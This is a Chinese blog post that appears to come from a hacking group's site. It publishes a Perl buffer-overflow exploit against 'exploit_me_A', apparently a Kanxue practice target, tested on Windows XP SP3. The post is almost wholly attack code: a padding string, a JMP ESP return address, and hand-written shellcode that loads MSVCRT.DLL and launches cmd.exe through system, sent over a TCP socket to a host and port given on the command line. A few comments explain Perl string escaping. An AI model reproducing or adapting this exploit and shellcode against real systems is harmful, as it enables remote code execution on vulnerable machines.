注册 登录  
 加关注
   显示下一条  |  关闭
温馨提示!由于新浪微博认证机制调整,您的新浪微博帐号绑定已过期,请重新绑定!立即重新绑定新浪微博》  |  关闭

K8拉登哥哥's Blog

K8搞基大队[K8team] 信息安全 网络安全 0day漏洞 渗透测试 黑客

 
 
 

日志

 
 

[溢出]Perl 看雪exploit_me_A exploit by k8team  

2013-10-20 11:25:39|  分类: 缓冲区溢出 |  标签: |举报 |字号 订阅

  下载LOFTER 我的照片书  |
#!/usr/bin/perl
# Perl exploit_me_A  exploit by k8team
# Date: 20131018
# Tested on: XPSP3

if (scalar(@ARGV) != 2) { "Usage $0 host port\n"; exit; }
use IO::Socket::INET;

my $JMPESP = "\x12\x45\xFA\x7F";
my $JMPback = "\xb9\x41\x41\x41\x25\xc1\xe9\x14\x2b\xe1\xff\xe4";

#shellcode cmd  XP SP3
my $shellcode =
"\x55\x8B\xEC\x33\xC0\x50\x50\x50" .
"\xC6\x45\xF4\x4D" .
"\xC6\x45\xF5\x53" .    
"\xC6\x45\xF6\x56" .    
"\xC6\x45\xF7\x43" .
"\xC6\x45\xF8\x52" .
"\xC6\x45\xF9\x54" .
"\xC6\x45\xFA\x2E" .
"\xC6\x45\xFB\x44" .
"\xC6\x45\xFC\x4C" .
"\xC6\x45\xFD\x4C" .
"\x8D\x45\xF4\x50\xBA\x7B\x1D\x80\x7C\xFF\xD2" .
"\x55\x8B\xEC\x83\xEC\x2C\xB8\x63\x6F\x6D\x6D" .
"\x89\x45\xF4\xB8\x61\x6E\x64\x2E" .    
"\x89\x45\xF8\xB8\x63\x6F\x6D\x22" .
"\x89\x45\xFC\x33\xD2\x88\x55\xFF" .
"\x8D\x45\xF4\x50\xB8\xC7\x93\xBF\x77\xFF\xD0";

#字符串 单引号 和双引号的区别
#"双引号" "\x41" 会转义 成A
#单引号 '\x41' 不会转义 直接输出\x41 这样就4个字节了
#my $a = '\x41' x 190 . "123456AAA2"; #    
my $a = "\x41" x 190 . "123456AAA2";

my $payload = $a . $JMPESP . $shellcode;

my $sock = IO::Socket::INET->new("$ARGV[0]:$ARGV[1]") or die "Unable toconnect!\n";

#print $payload;

sleep 1;
print $sock $payload;
print "Exploiting\n";
sleep 2;
print "Done\n";
  评论这张
 
阅读(619)| 评论(0)
推荐 转载

历史上的今天

在LOFTER的更多文章

评论

<#--最新日志,群博日志--> <#--推荐日志--> <#--引用记录--> <#--博主推荐--> <#--随机阅读--> <#--首页推荐--> <#--历史上的今天--> <#--被推荐日志--> <#--上一篇,下一篇--> <#-- 热度 --> <#-- 网易新闻广告 --> <#--右边模块结构--> <#--评论模块结构--> <#--引用模块结构--> <#--博主发起的投票-->
 
 
 
 
 
 
 
 
 
 
 
 
 
 

页脚

网易公司版权所有 ©1997-2016